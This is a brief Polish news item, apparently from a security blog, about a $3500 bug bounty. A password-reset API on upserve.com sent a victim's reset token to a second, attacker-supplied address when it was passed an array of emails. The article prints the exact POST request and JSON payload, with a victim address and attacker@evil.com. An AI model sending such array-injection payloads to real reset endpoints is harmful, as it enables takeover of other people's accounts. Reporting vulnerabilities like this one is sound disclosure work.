Kilka znaków i zgarnął $3500 – banalny sposób na przejmowanie dowolnego konta

W tym newsie bardziej liczy się sposób wykorzystania podatności niż sama ofiara (upserve.com). Wydaje się Wam, że w 2019r. mechanizmy resetu hasła są na tyle bezpieczne, sprawdzone, napisane już miliony razy, że ciężko jest znaleźć w nich coś krytycznego?

Błąd.

Żeby otrzymać token umożliwiający reset hasła dowolnego użytkownika w serwisie upserve.com wystarczyło wysłać takie żądanie (resetujące hasło np. użytkownikowi: admin@breadcrumb.com, ale…dodając swojego maila otrzymywaliśmy kopię wiadomości z cennym tokenem):

POST https://hq.breadcrumb.com/api/v1/password_reset HTTP/1.1

{„email_address”:[„admin@breadcrumb.com”,”attacker@evil.com”]}

Witamy w roku 2019 :-)

–ms